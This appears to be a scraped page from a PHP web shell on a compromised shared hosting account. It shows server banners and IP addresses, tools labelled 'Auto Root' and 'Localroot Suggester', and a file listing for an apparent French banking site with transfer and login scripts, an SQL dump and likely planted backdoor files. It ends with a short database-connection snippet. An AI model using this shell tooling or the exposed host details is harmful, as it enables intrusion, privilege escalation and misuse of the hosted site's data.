Linux business57.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
Server IP : 199.188.201.191 & Your IP : 13.58.48.103
Domains :
Cant Read [ /etc/named.conf ]
User : derozboy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
derozboy /
meltovixavo.online /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2024-11-12 08:31
app
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
assets
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
cartes-bancaires
[ DIR ]
drwxr-xr-x
2025-04-22 03:17
cgi-bin
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
connexion
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
contact
[ DIR ]
drwxr-xr-x
2025-04-22 03:17
demande-de-pret
[ DIR ]
drwxr-xr-x
2025-04-22 03:17
faq
[ DIR ]
drwxr-xr-x
2025-04-22 03:17
image
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
mentions-legales
[ DIR ]
drwxr-xr-x
2025-04-22 03:17
offres
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
ouverture-de-compte
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
partials
[ DIR ]
drwxr-xr-x
2025-04-22 01:18
tarifs
[ DIR ]
drwxr-xr-x
2025-04-22 03:17
.htaccess
197
B
-r--r--r--
2025-04-22 01:18
MELTOVIXAVO.zip
12.58
MB
-rw-r--r--
2024-07-17 20:39
admin.php
5.24
KB
-rw-r--r--
2025-04-22 03:17
dbv3.sql
4.43
KB
-rw-r--r--
2023-04-17 05:33
deconnexion.php
231
B
-rw-r--r--
2023-04-17 05:33
form.php
3.84
KB
-rw-r--r--
2024-07-18 01:07
index.html
47.39
KB
-rw-r--r--
2024-07-18 01:07
index.php
50.37
KB
-rw-r--r--
2025-04-22 09:48
info
132
B
-rw-r--r--
2024-07-18 01:06
login.php
6.23
KB
-rw-r--r--
2024-07-18 01:06
logo2.png
7.25
KB
-rw-r--r--
2024-07-18 00:49
mon-compte.php
2.26
KB
-rw-r--r--
2023-04-17 05:33
php.ini
847
B
-rw-r--r--
2021-12-16 15:29
pxm.txt
1
B
-rw-r--r--
2024-11-09 03:05
qqs.txt
1
B
-rw-r--r--
2025-01-17 03:29
robots.txt
72
B
-rw-r--r--
2025-04-22 09:48
ss.php
13.5
KB
-rw-r--r--
2024-11-15 08:50
transaction.php
11.95
KB
-rw-r--r--
2025-02-09 15:14
utilities.php
742
B
-rw-r--r--
2024-12-01 11:38
virement.php
3.82
KB
-rw-r--r--
2024-12-02 11:39
wp-blog-header.php
2.73
KB
-rw-r--r--
2025-04-22 01:18
wp-cron.php
2.73
KB
-rw-r--r--
2025-04-22 01:18
xgz.txt
1
B
-rw-r--r--
2025-04-22 09:48
Save
Rename
<?php require( 'app/admin/vendor/autoload.php' ); $dotenv = \Dotenv\Dotenv::createMutable( "app/admin/" ); $dotenv->load(); $GLOBALS['db'] = new \App\Providers\DBMySql( $_ENV['DB_HOST'], $_ENV['DB_NAME'], $_ENV['DB_USER'], $_ENV['DB_PASS'] ); function checklogin() { if ( !isset($_SESSION['user_id']) ) { $message = "Veuillez vous connectez."; return header("Location:/message.php?type=danger&message=$message"); } } function getSolde($transactions) { $solde = 0; foreach ($transactions as $trans) { if ( $trans->trans_type == 'plus' ) { $solde += $trans->trans_amount; } else { $solde -= $trans->trans_amount; } } return $solde; }